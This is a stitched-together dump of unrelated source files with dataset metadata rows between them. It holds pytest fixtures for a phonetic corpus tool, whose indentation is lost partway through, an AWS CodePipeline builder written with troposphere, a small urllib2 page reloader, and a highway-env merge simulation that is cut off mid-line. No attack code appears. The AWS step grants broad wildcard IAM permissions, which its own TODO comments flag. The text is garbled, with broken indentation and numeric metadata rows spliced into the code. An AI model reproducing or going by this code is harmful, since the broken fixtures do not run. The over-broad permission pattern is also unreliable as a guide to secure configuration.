    words = [('cats', 0.0, 0.4), ('are', 0.5, 0.7), ('cute', 0.8, 1.1),
             ('dogs', 2.0, 2.4), ('are', 2.4, 2.6), ('too', 2.6, 2.8),
             ('i', 3.0, 3.1), ('guess', 3.3, 3.6)]
    info = [('burst', 0, 0.05), ('vot', 0.05, 0.1), ('closure', 0.2, 0.25),
            ('burst', 0.25, 0.26), ('vot', 0.26, 0.3), ('closure', 2.2, 2.25),
            ('burst', 2.25, 2.26), ('vot', 2.26, 2.3),
            ('voicing_during_closure', 2.2, 2.23), ('voicing_during_closure', 2.24, 2.25)]
    levels[0].add(phones)
    levels[1].add(words)
    levels[2].add(info)
    hierarchy = Hierarchy({'phone': 'word', 'word': None})
    parser = BaseParser(levels, hierarchy)
    data = parser.parse_discourse('test_sub')
    return data


@pytest.fixture(scope='session')
def corpus_data_onespeaker(corpus_data_timed):
    for k in corpus_data_timed.data.keys():
        corpus_data_timed.data[k].speaker = 'some_speaker'
    return corpus_data_timed


@pytest.fixture(scope='session')
def corpus_data_untimed():
    levels = [TextTranscriptionTier('transcription', 'word'),
              TextOrthographyTier('spelling', 'word'),
              TextMorphemeTier('morpheme', 'word'),
              GroupingTier('line', 'line')]
    transcriptions = [('k.ae.t-s', 0), ('aa.r', 1), ('k.y.uw.t', 2),
                      ('d.aa.g-z', 3), ('aa.r', 4), ('t.uw', 5),
                      ('ay', 6), ('g.eh.s', 7)]
    morphemes = [('cat-PL', 0), ('are', 1), ('cute', 2),
                 ('dog-PL', 3), ('are', 4), ('too', 5),
                 ('i', 6), ('guess', 7)]
    words = [('cats', 0), ('are', 1), ('cute', 2),
             ('dogs', 3), ('are', 4), ('too', 5),
             ('i', 6), ('guess', 7)]
    lines = [(0, 2), (3, 5), (6, 7)]
    levels[0].add(transcriptions)
    levels[1].add(words)
    levels[2].add(morphemes)
    levels[3].add(lines)
    hierarchy = Hierarchy({'word': 'line', 'line': None})
    parser = BaseParser(levels, hierarchy)
    data = parser.parse_discourse('test_untimed')
    return data


@pytest.fixture(scope='session')
def corpus_data_ur_sr():
    levels = [SegmentTier('sr', 'phone'),
              OrthographyTier('word', 'word'),
              TranscriptionTier('ur', 'word')]
    srs = [('k', 0.0, 0.1), ('ae', 0.1, 0.2), ('s', 0.2, 0.4),
           ('aa', 0.5, 0.6), ('r', 0.6, 0.7),
           ('k', 0.8, 0.9), ('u', 0.9, 1.1),
           ('d', 2.0, 2.1), ('aa', 2.1, 2.2), ('g', 2.2, 2.25),
           ('ah', 2.25, 2.3), ('z', 2.3, 2.4),
           ('aa', 2.4, 2.5), ('r', 2.5, 2.6),
           ('t', 2.6, 2.7), ('uw', 2.7, 2.8),
           ('ay', 3.0, 3.1),
           ('g', 3.3, 3.4), ('eh', 3.4, 3.5), ('s', 3.5, 3.6)]
    words = [('cats', 0.0, 0.4), ('are', 0.5, 0.7), ('cute', 0.8, 1.1),
             ('dogs', 2.0, 2.4), ('are', 2.4, 2.6), ('too', 2.6, 2.8),
             ('i', 3.0, 3.1), ('guess', 3.3, 3.6)]
    urs = [('k.ae.t.s', 0.0, 0.4), ('aa.r', 0.5, 0.7), ('k.y.uw.t', 0.8, 1.1),
           ('d.aa.g.z', 2.0, 2.4), ('aa.r', 2.4, 2.6), ('t.uw', 2.6, 2.8),
           ('ay', 3.0, 3.1), ('g.eh.s', 3.3, 3.6)]
    levels[0].add(srs)
    levels[1].add(words)
    levels[2].add(urs)
    hierarchy = Hierarchy({'phone': 'word', 'word': None})
    parser = BaseParser(levels, hierarchy)
    data = parser.parse_discourse('test_ursr')
    return data


@pytest.fixture(scope='session')
def lexicon_data():
    corpus_data = [{'spelling': 'atema', 'transcription': ['ɑ', 't', 'e', 'm', 'ɑ'], 'frequency': 11.0},
                   {'spelling': 'enuta', 'transcription': ['e', 'n', 'u', 't', 'ɑ'], 'frequency': 11.0},
                   {'spelling': 'mashomisi', 'transcription': ['m', 'ɑ', 'ʃ', 'o', 'm', 'i', 's', 'i'],
                    'frequency': 5.0},
                   {'spelling': 'mata', 'transcription': ['m', 'ɑ', 't', 'ɑ'], 'frequency': 2.0},
                   {'spelling': 'nata', 'transcription': ['n', 'ɑ', 't', 'ɑ'], 'frequency': 2.0},
                   {'spelling': 'sasi', 'transcription': ['s', 'ɑ', 's', 'i'], 'frequency': 139.0},
                   {'spelling': 'shashi', 'transcription': ['ʃ', 'ɑ', 'ʃ', 'i'], 'frequency': 43.0},
                   {'spelling': 'shisata', 'transcription': ['ʃ', 'i', 's', 'ɑ', 't', 'ɑ'], 'frequency': 3.0},
                   {'spelling': 'shushoma', 'transcription': ['ʃ', 'u', 'ʃ', 'o', 'm', 'ɑ'], 'frequency': 126.0},
                   {'spelling': 'ta', 'transcription': ['t', 'ɑ'], 'frequency': 67.0},
                   {'spelling': 'tatomi', 'transcription': ['t', 'ɑ', 't', 'o', 'm', 'i'], 'frequency': 7.0},
                   {'spelling': 'tishenishu', 'transcription': ['t', 'i', 'ʃ', 'e', 'n', 'i', 'ʃ', 'u'],
                    'frequency': 96.0},
                   {'spelling': 'toni', 'transcription': ['t', 'o', 'n', 'i'], 'frequency': 33.0},
                   {'spelling': 'tusa', 'transcription': ['t', 'u', 's', 'ɑ'], 'frequency': 32.0},
                   {'spelling': 'ʃi', 'transcription': ['ʃ', 'i'], 'frequency': 2.0}]
    return corpus_data


@pytest.fixture(scope='session')
def corpus_data_syllable_morpheme_srur():
    levels = [SegmentTier('sr', 'phone', label=True),
              TranscriptionTier('ur', 'word'),
              GroupingTier('syllable', 'syllable'),
              MorphemeTier('morphemes', 'word'),
              OrthographyTier('word', 'word'),
              GroupingTier('line', 'line')]
    srs = [('b', 0, 0.1), ('aa', 0.1, 0.2), ('k', 0.2, 0.3), ('s', 0.3, 0.4),
           ('ah', 0.4, 0.5), ('s', 0.5, 0.6),
           ('er', 0.7, 0.8),
           ('f', 0.9, 1.0), ('er', 1.0, 1.1),
           ('p', 1.2, 1.3), ('ae', 1.3, 1.4), ('k', 1.4, 1.5), ('eng', 1.5, 1.6)]
    urs = [('b.aa.k.s-ah.z', 0, 0.6), ('aa.r', 0.7, 0.8),
           ('f.ao.r', 0.9, 1.1), ('p.ae.k-ih.ng', 1.2, 1.6)]
    syllables = [(0, 0.3), (0.3, 0.6), (0.7, 0.8), (0.9, 1.1),
                 (1.2, 1.5), (1.5, 1.6)]
    morphemes = [('box-PL', 0, 0.6), ('are', 0.7, 0.8),
                 ('for', 0.9, 1.1), ('pack-PROG', 1.2, 1.6)]
    words = [('boxes', 0, 0.6), ('are', 0.7, 0.8),
             ('for', 0.9, 1.1), ('packing', 1.2, 1.6)]
    lines = [(0, 1.6)]
    levels[0].add(srs)
    levels[1].add(urs)
    levels[2].add(syllables)
    levels[3].add(morphemes)
    levels[4].add(words)
    levels[5].add(lines)
    hierarchy = Hierarchy({'phone': 'syllable', 'syllable': 'word',
                           'word': 'line', 'line': None})
    parser = BaseParser(levels, hierarchy)
    data = parser.parse_discourse('test_syllable_morpheme')
    return data


@pytest.fixture(scope='session')
def graph_db():
    config = {'graph_http_port': 7474, 'graph_bolt_port': 7687,
              'acoustic_http_port': 8086}
    config['host'] = 'localhost'
    return config


@pytest.fixture(scope='session')
def untimed_config(graph_db, corpus_data_untimed):
    config = CorpusConfig('untimed', **graph_db)
    with CorpusContext(config) as c:
        c.reset()
        c.add_types(*corpus_data_untimed.types('untimed'))
        c.initialize_import(corpus_data_untimed.speakers,
                            corpus_data_untimed.token_headers,
                            corpus_data_untimed.hierarchy.subannotations)
        c.add_discourse(corpus_data_untimed)
        c.finalize_import(corpus_data_untimed)
    return config


@pytest.fixture(scope='session')
def timed_config(graph_db, corpus_data_timed):
    config = CorpusConfig('timed', **graph_db)
    with CorpusContext(config) as c:
        c.reset()
        c.add_types(*corpus_data_timed.types('timed'))
        c.initialize_import(corpus_data_timed.speakers,
                            corpus_data_timed.token_headers,
                            corpus_data_timed.hierarchy.subannotations)
        c.add_discourse(corpus_data_timed)
        c.finalize_import(corpus_data_timed)
    return config


@pytest.fixture(scope='session')
def syllable_morpheme_config(graph_db, corpus_data_syllable_morpheme_srur):
    config = CorpusConfig('syllable_morpheme', **graph_db)
    with CorpusContext(config) as c:
        c.reset()
        c.add_types(*corpus_data_syllable_morpheme_srur.types('syllable_morpheme'))
        c.initialize_import(corpus_data_syllable_morpheme_srur.speakers,
                            corpus_data_syllable_morpheme_srur.token_headers,
                            corpus_data_syllable_morpheme_srur.hierarchy.subannotations)
        c.add_discourse(corpus_data_syllable_morpheme_srur)
        c.finalize_import(corpus_data_syllable_morpheme_srur)
    return config


@pytest.fixture(scope='session')
def ursr_config(graph_db, corpus_data_ur_sr):
    config = CorpusConfig('ur_sr', **graph_db)
    with CorpusContext(config) as c:
        c.reset()
        c.add_types(*corpus_data_ur_sr.types('ur_sr'))
        c.initialize_import(corpus_data_ur_sr.speakers,
                            corpus_data_ur_sr.token_headers,
                            corpus_data_ur_sr.hierarchy.subannotations)
        c.add_discourse(corpus_data_ur_sr)
        c.finalize_import(corpus_data_ur_sr)
    return config


@pytest.fixture(scope='session')
def subannotation_config(graph_db, subannotation_data):
    config = CorpusConfig('subannotations', **graph_db)
    with CorpusContext(config) as c:
        c.reset()
        c.add_types(*subannotation_data.types('subannotations'))
        c.initialize_import(subannotation_data.speakers,
                            subannotation_data.token_headers,
                            subannotation_data.hierarchy.subannotations)
        c.add_discourse(subannotation_data)
        c.finalize_import(subannotation_data)
    return config


@pytest.fixture(scope='session')
def lexicon_test_data():
    data = {'cats': {'POS': 'NNS'}, 'are': {'POS': 'VB'}, 'cute': {'POS': 'JJ'},
            'dogs': {'POS': 'NNS'}, 'too': {'POS': 'IN'}, 'i': {'POS': 'PRP'},
            'guess': {'POS': 'VB'}}
    return data


@pytest.fixture(scope='session')
def acoustic_config(graph_db, textgrid_test_dir):
    config = CorpusConfig('acoustic', **graph_db)
    acoustic_path = os.path.join(textgrid_test_dir, 'acoustic_corpus.TextGrid')
    with CorpusContext(config) as c:
        c.reset()
        parser = inspect_textgrid(acoustic_path)
        c.load(parser, acoustic_path)
    config.pitch_algorithm = 'acousticsim'
    config.formant_source = 'acousticsim'
    return config


@pytest.fixture(scope='session')
def acoustic_syllabics():
    return ['ae', 'aa', 'uw', 'ay', 'eh', 'ih', 'aw', 'ey', 'iy',
            'uh', 'ah', 'ao', 'er', 'ow']


@pytest.fixture(scope='session')
def acoustic_utt_config(graph_db, textgrid_test_dir, acoustic_syllabics):
    config = CorpusConfig('acoustic_utt', **graph_db)
    acoustic_path = os.path.join(textgrid_test_dir, 'acoustic_corpus.TextGrid')
    with CorpusContext(config) as c:
        c.reset()
        parser = inspect_textgrid(acoustic_path)
        c.load(parser, acoustic_path)
        c.encode_pauses(['sil'])
        c.encode_utterances(min_pause_length=0)
        c.encode_syllabic_segments(acoustic_syllabics)
        c.encode_syllables()
    config.pitch_algorithm = 'acousticsim'
    config.formant_source = 'acousticsim'
    return config


@pytest.fixture(scope='session')
def overlapped_config(graph_db, textgrid_test_dir, acoustic_syllabics):
    config = CorpusConfig('overlapped', **graph_db)
    acoustic_path = os.path.join(textgrid_test_dir, 'overlapped_speech')
with CorpusContext(config) as c:
c.reset()
parser = inspect_mfa(acoustic_path)
c.load(parser, acoustic_path)
c.encode_pauses(['sil'])
c.encode_utterances(min_pause_length=0)
c.encode_syllabic_segments(acoustic_syllabics)
c.encode_syllables()
config.pitch_algorithm = 'acousticsim'
config.formant_source = 'acousticsim'
return config
@pytest.fixture(scope='session')
def french_config(graph_db, textgrid_test_dir):
config = CorpusConfig('french', **graph_db)
french_path = os.path.join(textgrid_test_dir, 'FR001_5.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_textgrid(french_path)
c.load(parser, french_path)
c.encode_pauses(['sil', '<SIL>'])
c.encode_utterances(min_pause_length=.15)
return config
@pytest.fixture(scope='session')
def fave_corpus_config(graph_db, fave_test_dir):
config = CorpusConfig('fave_test_corpus', **graph_db)
with CorpusContext(config) as c:
c.reset()
parser = inspect_fave(fave_test_dir)
c.load(parser, fave_test_dir)
return config
@pytest.fixture(scope='session')
def summarized_config(graph_db, textgrid_test_dir):
config = CorpusConfig('summarized', **graph_db)
acoustic_path = os.path.join(textgrid_test_dir, 'acoustic_corpus.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_textgrid(acoustic_path)
c.load(parser, acoustic_path)
return config
@pytest.fixture(scope='session')
def stressed_config(graph_db, textgrid_test_dir):
config = CorpusConfig('stressed', **graph_db)
stressed_path = os.path.join(textgrid_test_dir, 'stressed_corpus.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_mfa(stressed_path)
c.load(parser, stressed_path)
return config
@pytest.fixture(scope='session')
def partitur_corpus_config(graph_db, partitur_test_dir):
config = CorpusConfig('partitur', **graph_db)
partitur_path = os.path.join(partitur_test_dir, 'partitur_test.par,2')
with CorpusContext(config) as c:
c.reset()
parser = inspect_partitur(partitur_path)
c.load(parser, partitur_path)
return config
@pytest.fixture(scope='session')
def praat_path():
if sys.platform == 'win32':
return 'praatcon.exe'
elif os.environ.get('TRAVIS', False):
return os.path.join(os.environ.get('HOME'), 'tools', 'praat')
else:
return 'praat'
@pytest.fixture(scope='session')
def reaper_path():
if os.environ.get('TRAVIS', False):
return os.path.join(os.environ.get('HOME'), 'tools', 'reaper')
else:
return 'reaper'
@pytest.fixture(scope='session')
def vot_classifier_path(test_dir):
return os.path.join(test_dir, 'classifier', 'sotc_classifiers', 'sotc_voiceless.classifier')
@pytest.fixture(scope='session')
def localhost():
return 'http://localhost:8080'
@pytest.fixture(scope='session')
def stress_pattern_file(test_dir):
return os.path.join(test_dir, 'lexicons', 'stress_pattern_lex.txt')
@pytest.fixture(scope='session')
def timed_lexicon_enrich_file(test_dir):
return os.path.join(test_dir, 'csv', 'timed_enrichment.txt')
@pytest.fixture(scope='session')
def acoustic_speaker_enrich_file(test_dir):
return os.path.join(test_dir, 'csv', 'acoustic_speaker_enrichment.txt')
@pytest.fixture(scope='session')
def acoustic_discourse_enrich_file(test_dir):
return os.path.join(test_dir, 'csv', 'acoustic_discourse_enrichment.txt')
@pytest.fixture(scope='session')
def acoustic_inventory_enrich_file(test_dir):
return os.path.join(test_dir, 'features', 'basic.txt') | 35.815929 | 113 | 0.588308 | 2,781 | 20,236 | 4.121899 | 0.102481 | 0.049463 | 0.078513 | 0.109047 | 0.622612 | 0.522987 | 0.492192 | 0.404083 | 0.352787 | 0.327576 | 0 | 0.043194 | 0.220893 | 20,236 | 565 | 114 | 35.815929 | 0.683877 | 0.000692 | 0 | 0.410959 | 0 | 0 | 0.140399 | 0.013501 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116438 | false | 0 | 0.043379 | 0.052511 | 0.280822 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9d8f74d2d05d2035a3088b326a56139ee5b3ff4 | 10,285 | py | Python | cumulus/steps/dev_tools/pipeline.py | john-shaskin/cumulus | 4687d83ab324e57d900d9888da62e2fb7f4505e9 | [
"MIT"
] | null | null | null | cumulus/steps/dev_tools/pipeline.py | john-shaskin/cumulus | 4687d83ab324e57d900d9888da62e2fb7f4505e9 | [
"MIT"
] | 11 | 2018-09-10T22:57:31.000Z | 2019-02-28T17:21:24.000Z | cumulus/steps/dev_tools/pipeline.py | john-shaskin/cumulus | 4687d83ab324e57d900d9888da62e2fb7f4505e9 | [
"MIT"
] | 3 | 2018-09-05T20:33:35.000Z | 2018-10-17T16:01:26.000Z |
import awacs
import awacs.aws
import awacs.awslambda
import awacs.codecommit
import awacs.ec2
import awacs.iam
import awacs.logs
import awacs.s3
import awacs.sts
import awacs.kms
import troposphere
from troposphere import codepipeline, Ref, iam
from troposphere.s3 import Bucket, VersioningConfiguration
import cumulus.steps.dev_tools
from cumulus.chain import step
class Pipeline(step.Step):
def __init__(self,
name,
bucket_name,
pipeline_service_role_arn=None,
create_bucket=True,
pipeline_policies=None,
bucket_policy_statements=None,
bucket_kms_key_arn=None,
):
"""
        :type pipeline_service_role_arn: basestring Override the pipeline service role. If you pass this,
            pipeline_policies is ignored.
:type create_bucket: bool if False, will not create the bucket. Will attach policies either way.
        :type bucket_name: the name of the bucket that will be created, suffixed with the chain context instance name
:type bucket_policy_statements: [awacs.aws.Statement]
:type pipeline_policies: [troposphere.iam.Policy]
:type bucket_kms_key_arn: ARN used to decrypt the pipeline artifacts
"""
step.Step.__init__(self)
self.name = name
self.bucket_name = bucket_name
self.create_bucket = create_bucket
self.pipeline_service_role_arn = pipeline_service_role_arn
self.bucket_policy_statements = bucket_policy_statements
self.pipeline_policies = pipeline_policies or []
self.bucket_kms_key_arn = bucket_kms_key_arn
def handle(self, chain_context):
"""
This step adds in the shell of a pipeline.
* s3 bucket
* policies for the bucket and pipeline
* your next step in the chain MUST be a source stage
        :param chain_context: chain context carrying the CloudFormation template and shared metadata
:return:
"""
if self.create_bucket:
pipeline_bucket = Bucket(
"PipelineBucket%s" % self.name,
BucketName=self.bucket_name,
VersioningConfiguration=VersioningConfiguration(
Status="Enabled"
)
)
chain_context.template.add_resource(pipeline_bucket)
default_bucket_policies = self.get_default_bucket_policy_statements(self.bucket_name)
if self.bucket_policy_statements:
bucket_access_policy = self.get_bucket_policy(
pipeline_bucket=self.bucket_name,
bucket_policy_statements=self.bucket_policy_statements,
)
chain_context.template.add_resource(bucket_access_policy)
pipeline_bucket_access_policy = iam.ManagedPolicy(
"PipelineBucketAccessPolicy",
Path='/managed/',
PolicyDocument=awacs.aws.PolicyDocument(
Version="2012-10-17",
Id="bucket-access-policy%s" % chain_context.instance_name,
Statement=default_bucket_policies
)
)
chain_context.metadata[cumulus.steps.dev_tools.META_PIPELINE_BUCKET_NAME] = self.bucket_name
chain_context.metadata[cumulus.steps.dev_tools.META_PIPELINE_BUCKET_POLICY_REF] = Ref(
pipeline_bucket_access_policy)
default_pipeline_role = self.get_default_pipeline_role()
pipeline_service_role_arn = self.pipeline_service_role_arn or troposphere.GetAtt(default_pipeline_role, "Arn")
generic_pipeline = codepipeline.Pipeline(
"Pipeline",
RoleArn=pipeline_service_role_arn,
Stages=[],
ArtifactStore=codepipeline.ArtifactStore(
Type="S3",
Location=self.bucket_name,
)
)
if self.bucket_kms_key_arn:
encryption_config = codepipeline.EncryptionKey(
"ArtifactBucketKmsKey",
Id=self.bucket_kms_key_arn,
Type='KMS',
)
generic_pipeline.ArtifactStore.EncryptionKey = encryption_config
pipeline_output = troposphere.Output(
"PipelineName",
Description="Code Pipeline",
Value=Ref(generic_pipeline),
)
pipeline_bucket_output = troposphere.Output(
"PipelineBucket",
Description="Name of the input artifact bucket for the pipeline",
Value=self.bucket_name,
)
if not self.pipeline_service_role_arn:
chain_context.template.add_resource(default_pipeline_role)
chain_context.template.add_resource(pipeline_bucket_access_policy)
chain_context.template.add_resource(generic_pipeline)
chain_context.template.add_output(pipeline_output)
chain_context.template.add_output(pipeline_bucket_output)
def get_default_pipeline_role(self):
# TODO: this can be cleaned up by using a policytype and passing in the pipeline role it should add itself to.
pipeline_policy = iam.Policy(
PolicyName="%sPolicy" % self.name,
PolicyDocument=awacs.aws.PolicyDocument(
Version="2012-10-17",
Id="PipelinePolicy",
Statement=[
awacs.aws.Statement(
Effect=awacs.aws.Allow,
# TODO: actions here could be limited more
Action=[awacs.aws.Action("s3", "*")],
Resource=[
troposphere.Join('', [
awacs.s3.ARN(),
self.bucket_name,
"/*"
]),
troposphere.Join('', [
awacs.s3.ARN(),
self.bucket_name,
]),
],
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[awacs.aws.Action("kms", "*")],
Resource=['*'],
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.aws.Action("cloudformation", "*"),
awacs.aws.Action("codebuild", "*"),
],
# TODO: restrict more accurately
Resource=["*"]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.codecommit.GetBranch,
awacs.codecommit.GetCommit,
awacs.codecommit.UploadArchive,
awacs.codecommit.GetUploadArchiveStatus,
awacs.codecommit.CancelUploadArchive
],
Resource=["*"]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.iam.PassRole
],
Resource=["*"]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.aws.Action("lambda", "*")
],
Resource=["*"]
),
],
)
)
pipeline_service_role = iam.Role(
"PipelineServiceRole",
Path="/",
AssumeRolePolicyDocument=awacs.aws.Policy(
Statement=[
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[awacs.sts.AssumeRole],
Principal=awacs.aws.Principal(
'Service',
"codepipeline.amazonaws.com"
)
)]
),
Policies=[pipeline_policy] + self.pipeline_policies
)
return pipeline_service_role
def get_default_bucket_policy_statements(self, pipeline_bucket):
bucket_policy_statements = [
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.s3.ListBucket,
awacs.s3.GetBucketVersioning,
],
Resource=[
troposphere.Join('', [
awacs.s3.ARN(),
pipeline_bucket,
]),
],
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.s3.HeadBucket,
],
Resource=[
'*'
]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.s3.GetObject,
awacs.s3.GetObjectVersion,
awacs.s3.PutObject,
awacs.s3.ListObjects,
awacs.s3.ListBucketMultipartUploads,
awacs.s3.AbortMultipartUpload,
awacs.s3.ListMultipartUploadParts,
awacs.aws.Action("s3", "Get*"),
],
Resource=[
troposphere.Join('', [
awacs.s3.ARN(),
pipeline_bucket,
'/*'
]),
],
)
]
return bucket_policy_statements
def get_bucket_policy(self, pipeline_bucket, bucket_policy_statements):
policy = troposphere.s3.BucketPolicy(
"PipelineBucketPolicy",
Bucket=pipeline_bucket,
PolicyDocument=awacs.aws.Policy(
Statement=bucket_policy_statements,
),
)
return policy
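# --- Illustrative usage (an assumed sketch, not part of the original module) ---
# Constructing the step is plain instantiation; per handle() above, the step
# that follows it in the chain must be a source stage:
#
#   pipeline_step = Pipeline(name='App', bucket_name='app-pipeline-artifacts')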
| 37.673993 | 118 | 0.50841 | 852 | 10,285 | 5.911972 | 0.206573 | 0.052412 | 0.05678 | 0.045662 | 0.342863 | 0.268215 | 0.205281 | 0.187413 | 0.142545 | 0.11217 | 0 | 0.006331 | 0.416432 | 10,285 | 272 | 119 | 37.8125 | 0.832889 | 0.089159 | 0 | 0.337662 | 0 | 0 | 0.040633 | 0.008018 | 0 | 0 | 0 | 0.003676 | 0 | 1 | 0.021645 | false | 0.004329 | 0.064935 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9da06c2dab9036fffee0adcf12fef779efeb4ab | 308 | py | Python | sitetest/core/sandbox.py | ninapavlich/sitetest | 2f5942c5280e5e7516e28be669013ee74bf03da3 | [
"Apache-2.0"
] | 3 | 2017-10-17T13:44:51.000Z | 2018-11-17T15:43:08.000Z | sitetest/core/sandbox.py | ninapavlich/sitetest | 2f5942c5280e5e7516e28be669013ee74bf03da3 | [
"Apache-2.0"
] | 20 | 2015-01-06T21:06:14.000Z | 2021-12-13T19:58:56.000Z | sitetest/core/sandbox.py | ninapavlich/sitetest | 2f5942c5280e5e7516e28be669013ee74bf03da3 | [
"Apache-2.0"
] | null | null | null | import logging
import urllib2
logger = logging.getLogger('sitetest')
def reload_url(url, user_agent_string):
request = urllib2.Request(url)
request.add_header('User-agent', user_agent_string)
response = urllib2.urlopen(request)
logger.info("Response: %s: %s" % (response.code, response))
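# Illustrative usage (performs a live request; the URL and agent string are
# example values):
#
#   reload_url('http://example.com/', 'sitetest-bot/1.0')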
| 23.692308 | 63 | 0.730519 | 39 | 308 | 5.615385 | 0.512821 | 0.123288 | 0.136986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.142857 | 308 | 12 | 64 | 25.666667 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.11039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9de78e19fbd2362a60c1cdeb5bc9c8ec641c068 | 12,366 | py | Python | highway_env/envs/merge_out.py | jasonplato/High_SimulationPlatform | 8a0ed628ed824d08150ceff13487194212e95693 | [
"MIT"
] | null | null | null | highway_env/envs/merge_out.py | jasonplato/High_SimulationPlatform | 8a0ed628ed824d08150ceff13487194212e95693 | [
"MIT"
] | 1 | 2020-03-19T08:50:34.000Z | 2020-03-19T08:50:34.000Z | highway_env/envs/merge_out.py | jasonplato/Highway_SimulationPlatform | 8a0ed628ed824d08150ceff13487194212e95693 | [
"MIT"
] | null | null | null | from __future__ import division, print_function, absolute_import
import numpy as np
from highway_env import utils
from highway_env.envs.abstract import AbstractEnv
from highway_env.road.lane import LineType, StraightLane, SineLane, LanesConcatenation
from highway_env.road.road import Road, RoadNetwork
from highway_env.vehicle.control import ControlledVehicle, MDPVehicle, CarSim, FreeControl
from highway_env.vehicle.behavior import IDMVehicle
from highway_env.vehicle.dynamics import RedLight
import time
import random
class MergeEnvOut(AbstractEnv):
"""
A highway merge negotiation environment.
    The ego-vehicle is driving on a highway and approaches a merge, with some vehicles incoming on the access ramp.
It is rewarded for maintaining a high velocity and avoiding collisions, but also making room for merging
vehicles.
"""
COLLISION_REWARD = -1
RIGHT_LANE_REWARD = 0.1
HIGH_VELOCITY_REWARD = 0.2
MERGING_VELOCITY_REWARD = -0.5
LANE_CHANGE_REWARD = -0.05
DEFAULT_CONFIG = {"other_vehicles_type": "highway_env.vehicle.behavior.IDMVehicle",
"incoming_vehicle_destination": None,
"other_vehicles_destination": None}
def __init__(self):
super(MergeEnvOut, self).__init__()
self.config = self.DEFAULT_CONFIG.copy()
self.steps = 0
# self.make_road()
# self.reset()
# self.double_merge()
# self.make_vehicles()
def configure(self, config):
self.config.update(config)
def _observation(self):
return super(MergeEnvOut, self)._observation()
def _reward(self, action):
"""
The vehicle is rewarded for driving with high velocity on lanes to the right and avoiding collisions, but
an additional altruistic penalty is also suffered if any vehicle on the merging lane has a low velocity.
:param action: the action performed
:return: the reward of the state-action transition
"""
action_reward = {0: self.LANE_CHANGE_REWARD,
1: 0,
2: self.LANE_CHANGE_REWARD,
3: 0,
4: 0}
reward = self.COLLISION_REWARD * self.vehicle.crashed \
+ self.RIGHT_LANE_REWARD * self.vehicle.lane_index / (len(self.road.lanes) - 2) \
+ self.HIGH_VELOCITY_REWARD * self.vehicle.velocity_index / (self.vehicle.SPEED_COUNT - 1)
# Altruistic penalty
for vehicle in self.road.vehicles:
if vehicle.lane_index == len(self.road.lanes) - 1 and isinstance(vehicle, ControlledVehicle):
reward += self.MERGING_VELOCITY_REWARD * \
(vehicle.target_velocity - vehicle.velocity) / vehicle.target_velocity
return reward + action_reward[action]
def _is_terminal(self):
"""
The episode is over when a collision occurs or when the access ramp has been passed.
"""
return self.vehicle.crashed or self.vehicle.position[0] > 300
def reset(self):
# self.make_road()
print("enter reset")
self.make_roads()
self.make_vehicles()
return self._observation()
def make_roads(self):
net = RoadNetwork()
n, c, s = LineType.NONE, LineType.CONTINUOUS, LineType.STRIPED
net.add_lane("s1", "inter1", StraightLane(np.array([0, 0]), np.array([100, 0]), line_types=[c, s]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 0]), np.array([150, 0]), line_types=[c, s]))
net.add_lane("inter2", "inter3", StraightLane(np.array([150, 0]), np.array([200, 0]), line_types=[c, s]))
net.add_lane("inter3", "x1", StraightLane(np.array([200, 0]), np.array([300, 0]), line_types=[c, s]))
net.add_lane("s1", "inter1", StraightLane(np.array([0, 4]), np.array([100, 4]), line_types=[s, s]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 4]), np.array([150, 4]), line_types=[s, s]))
net.add_lane("inter2", "inter3", StraightLane(np.array([150, 4]), np.array([200, 4]), line_types=[s, s]))
net.add_lane("inter3", "x1", StraightLane(np.array([200, 4]), np.array([300, 4]), line_types=[s, s]))
net.add_lane("s1", "inter1", StraightLane(np.array([0, 8]), np.array([100, 8]), line_types=[s, s]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 8]), np.array([150, 8]), line_types=[s, s]))
net.add_lane("inter2", "inter3", StraightLane(np.array([150, 8]), np.array([200, 8]), line_types=[s, c]))
net.add_lane("inter3", "x1", StraightLane(np.array([200, 8]), np.array([300, 8]), line_types=[s, c]))
amplitude = 4.5
net.add_lane("s1", "inter1", StraightLane(np.array([0, 12]), np.array([100, 12]), line_types=[s, c]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 12]), np.array([150, 12]), line_types=[s, c]))
net.add_lane("inter2", "ee", StraightLane(np.array([150, 12]), np.array([200, 12]), line_types=[s, c],forbidden=True))
net.add_lane("ee", "ex",
